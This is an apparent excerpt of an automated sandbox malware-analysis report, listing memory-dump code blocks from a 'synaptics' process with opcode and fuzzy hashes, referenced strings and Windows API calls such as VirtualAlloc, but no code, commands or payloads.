                                                                                                                                                                                                                                    • Opcode ID: 550f9eef4ac3a55118e3242f022b0f9d99833849eef9e230360875dae9fa237d
                                                                                                                                                                                                                                    • Instruction ID: b411c0b40d1fcb6a76872c640e45933e3df3d4b08457ecfaa2523d401ebc85a2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550f9eef4ac3a55118e3242f022b0f9d99833849eef9e230360875dae9fa237d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C141D272704201ABD7209B65DC05F9B7BA9EFC5728F10422CED19C7680E730DC85CBA2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • field 'target' is required for NamedExpr, xrefs: 6CAD34E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAD3000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAD3000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cad3000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: field 'target' is required for NamedExpr
                                                                                                                                                                                                                                    • API String ID: 0-2867299937
                                                                                                                                                                                                                                    • Opcode ID: da6006f7ed78f48e9c01bb4492473935faf639bffdc30c52b338b1de0a265e61
                                                                                                                                                                                                                                    • Instruction ID: aa2efea22f173ca98c553055af0cb371d598b31c8f5652be0517e4d5cc528182
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da6006f7ed78f48e9c01bb4492473935faf639bffdc30c52b338b1de0a265e61
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F091DEB56062008FCB14CF28D880B5A73F5EB44328F1945AAEC458BB82E775E8C8CBD0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB27000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB27000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb27000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: ( )
                                                                                                                                                                                                                                    • API String ID: 0-61317390
                                                                                                                                                                                                                                    • Opcode ID: e6e283f4054d85216d91bf3f0a01e3d820b9b64811e911b39b5689b6bc3cbc84
                                                                                                                                                                                                                                    • Instruction ID: 462fc9ef8bb5d351035b5aa17e3147617d2a6b0f22ca4d696549173a0321907d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e283f4054d85216d91bf3f0a01e3d820b9b64811e911b39b5689b6bc3cbc84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAA1BF706057418FD700CF29C44176ABBF1FF8A319F148A1DE8999BBA1E7B8D584CB86
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • int string too large to convert, xrefs: 6CA346E3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: int string too large to convert
                                                                                                                                                                                                                                    • API String ID: 0-708287007
                                                                                                                                                                                                                                    • Opcode ID: 83493ce53bedb0fab487bc435728dee59d76a07e6395d42b6aa55eff92f80fff
                                                                                                                                                                                                                                    • Instruction ID: a42eecb393063b585ed0a61ca19e44cbdd63315fab8472f950b29d019468b238
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83493ce53bedb0fab487bc435728dee59d76a07e6395d42b6aa55eff92f80fff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF513571B046114FD304CF29D8517AABBE1EFC6324F18467AE968CBB91D731D88A8B91
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • I/O operation on closed file, xrefs: 6C9C82BC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C8000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: I/O operation on closed file
                                                                                                                                                                                                                                    • API String ID: 0-532592980
                                                                                                                                                                                                                                    • Opcode ID: ce8b8f121c15a82e8ddb7bad50fa0ecc02b161ed8280976439b0025ce791b60b
                                                                                                                                                                                                                                    • Instruction ID: 4f673471992aa1feb40f7cfdea57db21844e2055b535a6ce7ab6cd373933ca51
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8b8f121c15a82e8ddb7bad50fa0ecc02b161ed8280976439b0025ce791b60b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C95115B5B04201ABE704DF54CC45E6BB7A8AF85368F05422AFC2497E91E730EC45C79B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • I/O operation on closed file, xrefs: 6C9C801D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C8000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: I/O operation on closed file
                                                                                                                                                                                                                                    • API String ID: 0-532592980
                                                                                                                                                                                                                                    • Opcode ID: a5b4ef921b82ca7e1f137c4fb3b4b17b3016679ec7143eb0df63096c01cbe2b0
                                                                                                                                                                                                                                    • Instruction ID: 102085c210795ba989a696c35690aa47f828b942d3ec446479182a511e7bfb10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5b4ef921b82ca7e1f137c4fb3b4b17b3016679ec7143eb0df63096c01cbe2b0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8312971B002019BD714DF64DC45B9A77F8BF41338F094265E81497B91E724DD45C797
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • too many digits in integer, xrefs: 6CA31905
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: too many digits in integer
                                                                                                                                                                                                                                    • API String ID: 0-41470230
                                                                                                                                                                                                                                    • Opcode ID: 4b782264ca07d2b996667fd7fe42b264accc8b429a1debb2f73baf924eb1fc78
                                                                                                                                                                                                                                    • Instruction ID: a6e95ed794975e5844f2909bfae1c7d5f25c42a592510e86e8e1655376ae0162
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b782264ca07d2b996667fd7fe42b264accc8b429a1debb2f73baf924eb1fc78
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91112C7270111047CB105BA9AC112AA7BF9DB9627AF041239EC1CC7F91EB31D894C6D1
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 6C9BC01B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9AE000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9AE000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9ae000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                    • Opcode ID: b9ba70a1f6691b4b489c93614bbd70740dc9460a324f5c6c83ad2ab42ed2bde9
                                                                                                                                                                                                                                    • Instruction ID: 8430dfdcfa7f32ecd3d29f3dae273fad5b66ee2ceb1c3592c0f35e915619eac3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9ba70a1f6691b4b489c93614bbd70740dc9460a324f5c6c83ad2ab42ed2bde9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4118232602A10ABCF206F56C804B5BBBB8BF56715F044219E959A3A90C374F959CFD1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • I/O operation on closed file, xrefs: 6C9C8556
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C8000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: I/O operation on closed file
                                                                                                                                                                                                                                    • API String ID: 0-532592980
                                                                                                                                                                                                                                    • Opcode ID: 15828e111aff054513c0b9b79ebbcc2acd8919369dc14c424a6138d39c43d5b3
                                                                                                                                                                                                                                    • Instruction ID: 83830e0d4e5a4a46d5cdd49473a9132c33936ebe8780617d15654cdf4eaabe82
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15828e111aff054513c0b9b79ebbcc2acd8919369dc14c424a6138d39c43d5b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014E7674010417E71055A5EC85BA2739CD781339F144276EE0C8B7C0EA51EC4682E7
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 6CA4626F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA42000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA42000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca42000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                    • Opcode ID: 68081a3c5757b343da4f1ed53c32e6de67e1148c4616f3179018366a3265e9b2
                                                                                                                                                                                                                                    • Instruction ID: f12ac5c6cc965ee6ebd1cdd9dbf7da40ebcdb8045b196d5ef249329a9e65f04b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68081a3c5757b343da4f1ed53c32e6de67e1148c4616f3179018366a3265e9b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48B09231285308B7EE112AD2AC06F547B2CA709F35F008000FB0C190C146B2A1104659
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 6CA4628D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA42000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA42000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca42000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                    • Opcode ID: 5a4f04549a72a1b25219cc3c7724d1934bc194d53e68e9f17057a1fb70d45a18
                                                                                                                                                                                                                                    • Instruction ID: ac0ef46a4b31916fd4f7373fbdc6693facb65bfe4bdfd200b32c1e5b1e00e67a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a4f04549a72a1b25219cc3c7724d1934bc194d53e68e9f17057a1fb70d45a18
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7B0123128030CB7DF102E82FC06F943B2CF705B31F208111FA0C190E04BB2F4104A48
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA9C000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA9C000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca9c000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 30877e4a90422908b3ea00eab6dd9e6284b8a74691e76105fe687a4c9ebd1d07
                                                                                                                                                                                                                                    • Instruction ID: f169dda77dc0e7c6b6902b0dd8711b3d73c4ee5742562b2d134b24eedb494920
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30877e4a90422908b3ea00eab6dd9e6284b8a74691e76105fe687a4c9ebd1d07
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA826870614B018FD710EF16C582B5AB7F1AB8430CF18892ED84A87F91EB75E889CF91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAAF000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAAF000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caaf000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1ca7af6a68a1025c88d5d54436970cf92137bff9873265b84b20365caf2ac391
                                                                                                                                                                                                                                    • Instruction ID: 3cb1a8a35866ef0c4bca862aa83ab3cadd51f96156ca1451e373f3e4638c2329
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ca7af6a68a1025c88d5d54436970cf92137bff9873265b84b20365caf2ac391
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7228B706047018FD724CF5AD880B5AB7F5EB84318F14892EE85987F91E776E88ACF91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAAF000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAAF000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caaf000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 29b581135f611d8a8bd4d6a6bb81010bccd609ca9f5fe1fe03315f42ffb9716c
                                                                                                                                                                                                                                    • Instruction ID: fcc63375ad3ca4ba30864f5c5a4c5ba70abd946f2ebe27c0339d6de3bc16fa2b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29b581135f611d8a8bd4d6a6bb81010bccd609ca9f5fe1fe03315f42ffb9716c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2126D746057029FDB08CF66D980BAAB7E0BB4430DF14412EE814CBB91E775E49ACF91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9b2585cdcf5450f0ef9c109e8d3b5e61c48970ed497b5a97209d3f40c0b9daab
                                                                                                                                                                                                                                    • Instruction ID: b98c93909ec98e96fbf55e22818b922bb4916cbb44c08e8839bf63db135a8c37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b2585cdcf5450f0ef9c109e8d3b5e61c48970ed497b5a97209d3f40c0b9daab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4E1C6747006059FDB04DF69D980A5AB7F5FF48318B288168E829CBB51EB31ED87CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 357beb3ca6239633441f4600229fc2daecaf0c233c216dc7d2e017c72e585ea2
                                                                                                                                                                                                                                    • Instruction ID: c8a9e47ef1f2077d48dbe2ca302fa4e3f004067c6d16e09a9d592764e70dedd7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 357beb3ca6239633441f4600229fc2daecaf0c233c216dc7d2e017c72e585ea2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E0228B4E002069FDB14CFA9C980A9EBBB5FF48318F148659E855AB741D730E989DF90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: eb6c1ff4305a6b359de2d22c28549ca83b96fa51c9d543ed1942e1471dd566af
                                                                                                                                                                                                                                    • Instruction ID: c47296408a0f11a7b0b82a938dc425cc91d58a02b955131bd96d2d0e680da77d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb6c1ff4305a6b359de2d22c28549ca83b96fa51c9d543ed1942e1471dd566af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90E15274B012058FDB44CF29C590669B7E5FF88314B6881A9E829DB741EB31ED97CBE0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9D6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9D6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9d6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cacf1d9e5bbf514d18ef1aa266d90f5f3dc58db967445c6b4545d1d0aea63f7e
                                                                                                                                                                                                                                    • Instruction ID: 47196dce4b1080fadbf3df74145817f3e7b47699cfcd2d3ba9b258a0f57d145f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cacf1d9e5bbf514d18ef1aa266d90f5f3dc58db967445c6b4545d1d0aea63f7e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFC12771A04A019FC700CF68DC40A4BB7F8AF55368F058B6DF965E7A92E731E949CB81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB2B000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB2B000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb2b000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dd522556a538b2f35aad52f74c33a89bd8b918c4f149d794a76da684a416d047
                                                                                                                                                                                                                                    • Instruction ID: 71f925710744d5fcd05a2adcad4d13f07e85114466900c2bc480b2d538198ac4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd522556a538b2f35aad52f74c33a89bd8b918c4f149d794a76da684a416d047
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BC1E3B1A042019BDB00CF64DC05B9B77E4EF45328F044638E99D9B7A1EB39E949CBD2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a0e1dc28bf6e2879f4ea549657c744a0f60ce8afb761a383584f3ff18a5fcb8d
                                                                                                                                                                                                                                    • Instruction ID: a26b692a704e80c7dd36d577f08129d7f251f6d4b44bf9567c14839b2b0fcced
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e1dc28bf6e2879f4ea549657c744a0f60ce8afb761a383584f3ff18a5fcb8d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63C16EB0E002068FDB14CF69C990AAEBBB2FF8C308F194569D8459B741D775EC89DB90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA9C000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA9C000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca9c000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dc23eb262dfade947e6c63018124d9d0679a489ebdcc6e10880cdce94aa508f3
                                                                                                                                                                                                                                    • Instruction ID: 22857c055d310e3466fadd4cbe54d92269a6547907b05506b6565e6789691a92
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc23eb262dfade947e6c63018124d9d0679a489ebdcc6e10880cdce94aa508f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51B18870614B018FD710EF16D982B16B7F5EB8431CF18892EE85A87B91E771E888CF91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: eecfc5818c3cd74ea6350413b92941e3a65839534f7c2672982e3f589d5bdd56
                                                                                                                                                                                                                                    • Instruction ID: 3aee3c121e65757ee9481370553da607bf790fe9552c4261a907fc2a9e624254
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eecfc5818c3cd74ea6350413b92941e3a65839534f7c2672982e3f589d5bdd56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23A1C0B16043019FD700CF2AD845B66BBF4EF89328F10466DE9588BB91DB31E955CB93
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAAF000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAAF000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caaf000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e4b646d84726fc62b406e3490e7161d68552ce9cd1300dad96dd7e4cd4d73dde
                                                                                                                                                                                                                                    • Instruction ID: 1eac5c576400019211317bcc62e791853cdd911748472caf7bbbb72db1f4b887
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b646d84726fc62b406e3490e7161d68552ce9cd1300dad96dd7e4cd4d73dde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4B178746047018FD7188FA6C980A56B7F1FB88318F58462ED95987F50E772E8CACF91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ffceb51b9c41be8a5b7275283c98b12427a1a62890f703f33f534e57e0897015
                                                                                                                                                                                                                                    • Instruction ID: 589f3be066b4b804ccc8af5f08f03a0f878846e4ce860c829eb2569d678f19e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffceb51b9c41be8a5b7275283c98b12427a1a62890f703f33f534e57e0897015
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0591F471A017118FE700CF58D981B56B7E4EF41328F18466DE8598BB92D739E885CBC1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 56883d62ddde743dfe84d1295354e94fdf0fa00f4a550088013d6a4a5bf56710
                                                                                                                                                                                                                                    • Instruction ID: 91fde529d7d7f728184ec11a0aab466a55aa76dcb82bff6c28fd87dab0dec40e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56883d62ddde743dfe84d1295354e94fdf0fa00f4a550088013d6a4a5bf56710
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DA165B0E002068BDB14DF99C99099EFBF1FF8D318B18852AD855AB740D774A985DF90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 16bfc8cb45b3bd1919b73f74e215d8dcb9ba34ce0ae5746c72e44e12200d74c0
                                                                                                                                                                                                                                    • Instruction ID: 85df39ce242a1b226970b0dcba4d92233d913f2c249989b38e270b6139703fc1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16bfc8cb45b3bd1919b73f74e215d8dcb9ba34ce0ae5746c72e44e12200d74c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 398114716152019FC700CF69EC81A96BBF0FF45329F18466EE91887B91E732E899CB91
                                                                                                                                                                                                                                    Memory Dump Source
